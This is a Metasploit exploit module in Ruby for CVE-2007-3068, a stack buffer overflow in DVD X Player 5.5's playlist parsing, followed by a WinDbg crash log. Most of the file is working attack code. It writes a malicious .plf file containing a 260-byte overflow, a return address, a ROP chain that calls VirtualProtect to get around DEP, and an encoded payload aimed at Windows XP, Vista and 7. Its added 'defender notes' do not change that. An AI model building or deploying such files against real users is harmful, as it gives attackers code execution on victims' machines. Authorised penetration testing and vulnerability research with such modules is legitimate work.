##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# File-format module for CVE-2007-3068: a stack-based buffer overflow in the
# playlist (.plf) handling of DVD X Player 5.5 Standard / Pro.
#
# Per the module description, MediaPlayerCtrl.dll extracts a filename from the
# playlist data and copies it onto the stack without a bounds check. The module
# only writes a file through Msf::Exploit::FILEFORMAT.
#
# Notes for defenders:
# * The layout depends on hard-coded addresses attributed to EPG.dll and
#   SkinScrollBar.dll, so it presumably assumes those modules load at fixed
#   bases (no ASLR/rebasing) -- TODO confirm against the shipped binaries.
# * The root cause is the unchecked copy in the player; removing or replacing
#   the affected product addresses it, filtering individual files does not.
# * The saved return address is reached 260 bytes into the filename string
#   ('Offset'), so a .plf entry far longer than an ordinary path is anomalous.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata and the FILENAME option.
  #
  # @param info [Hash] metadata handed in by the framework; combined with the
  #   values below through update_info
  def initialize(info = {})
    authors = [
      'n00b',      # Initial discovery, poc for 4.1
      'D3r K0n!G', # Proof-of-concept for 5.5
      'sickness',  # ROP
      'sinn3r'     # Metasploit
    ]

    references = [
      ['CVE', '2007-3068'],
      ['OSVDB', '36956'],
      ['BID', '24278'],
      ['EDB', '17745']
    ]

    payload_constraints = {
      'Space'           => 1000,
      'BadChars'        => "\x00\x0a\x0d\x1a",
      'StackAdjustment' => -3500
    }

    target_settings = {
      'Offset' => 260,        # To EIP
      'Ret'    => 0x61626702, # POP EAX; RET [EPG.dll]
      'Max'    => 2000        # Max buffer size
    }

    # NOTE(review): the description text contains typos ("casues", "results
    # arbitrary"); it is runtime text shown to users and is left unchanged here.
    super(update_info(info,
      'Name'           => 'DVD X Player 5.5 .plf PlayList Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
        Standard. By supplying a long string of data in a plf file (playlist), the
        MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
        and then copy it on the stack without any proper bounds checking, which casues a
        buffer overflow, and results arbitrary code execution under the context of the user.

        This module has been designed to target common Windows systems such as:
        Windows XP SP2/SP3, Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         => authors,
      'References'     => references,
      'Payload'        => payload_constraints,
      'DefaultOptions' => { 'EXITFUNC' => 'seh' }, # none/process/seh
      'Platform'       => 'win',
      'Targets'        => [['DVD X Player 5.5 Standard / Pro', target_settings]],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 02 2007',
      'DefaultTarget'  => 0))

    filename_option = OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
    register_options([filename_option], self.class)
  end

  # Assembles the playlist contents and writes them out with file_create.
  #
  # Layout, in order: random filler up to the saved return address, the
  # target's 'Ret' value, 16 bytes of filler, the packed gadget list, 15 NOPs,
  # the encoded payload, then random filler up to the target's 'Max' size.
  def exploit
    # Going by the per-entry notes, the list fetches the VirtualProtect import
    # and prepares register values before PUSHAD. The two constants are stored
    # negated, presumably because 0x00 is listed in BadChars.
    # Defender note: a VirtualProtect request with protection 0x40
    # (PAGE_EXECUTE_READWRITE) against stack memory is a behaviour that
    # exploit-mitigation and EDR tooling can flag.
    rop_chain = [
      0x10011108, # VirtualProtect IAT [SkinScrollBar.dll]
      0x616306ed, # MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
      0x616385d8, # XCHG EAX,ESI; RETN 0 [EPG.dll]
      0x6162d202, # POP EBP; RET [EPG.dll]
      0x6160cac8, # PUSH ESP [EPG.dll]
      0x61626702, # POP EAX; RET [EPG.dll]
      0xfffffaff, # Value to negate, will become 0x00000501
      0x61627d9c, # NEG EAX; RET [EPG.dll]
      0x61640124, # XCHG EAX,EBX; RET [EPG.dll]
      0x61626702, # POP EAX; RET [EPG.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x61627d9c, # NEG EAX; RET [EPG.dll]
      0x61608ba2, # XCHG EAX,EDX; RET [EPG.dll]
      0x6160b804, # POP ECX; RET [EPG.dll]
      0x6164b001, # Writable location [EPG.dll]
      0x6162e587, # POP EDI; RET [EPG.dll]
      0x6163081d, # ROP NOP [EPG.dll]
      0x61626702, # POP EAX; RET [EPG.dll]
      0x90909090, # Value popped into EAX by the previous entry (x86 NOP bytes)
      0x61620831  # PUSHAD; RET [EPG.dll]
    ].pack('V*')

    segments = [
      rand_text_alpha(target['Offset']),
      [target.ret].pack('V'),
      rand_text_alpha(16),
      rop_chain,
      make_nops(15),
      payload.encoded
    ]

    playlist = ''
    segments.each { |segment| playlist << segment }

    # Pad with random letters so the file body is exactly target['Max'] bytes.
    padding_length = target['Max'] - playlist.length
    playlist << rand_text_alpha(padding_length)

    print_status("Creating #{datastore['FILENAME']}...")
    file_create(playlist)
  end
end
=begin
6400cd42 ffd3 call ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
0:000> p
eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
MediaPlayerCtrl+0xcd44:
6400cd44 8b8dec000000 mov ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
0:000> dd eax
0406a15c 41414141 41414141 41414141 41414141
0406a16c 41414141 41414141 41414141 41414141
0406a17c 41414141 41414141 41414141 41414141
0406a18c 41414141 41414141 41414141 41414141
0406a19c 41414141 41414141 41414141 41414141
0406a1ac 41414141 41414141 41414141 41414141
0406a1bc 41414141 41414141 41414141 41414141
0406a1cc 41414141 41414141 41414141 41414141
0:000> g
Breakpoint 2 hit
eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
MediaPlayerCtrl+0xcd4e:
6400cd4e ff17 call dword ptr [edi] ds:0023:6405362c=6400d890
0:000> g
(464.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
MediaPlayerCtrl!DllCreateObject+0x220:
6400dd50 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !address 6400dd50
64000000 : 64001000 - 0004e000
Type 01000000 MEM_IMAGE
Protect 00000020 PAGE_EXECUTE_READ
State 00001000 MEM_COMMIT
Usage RegionUsageImage
FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
=end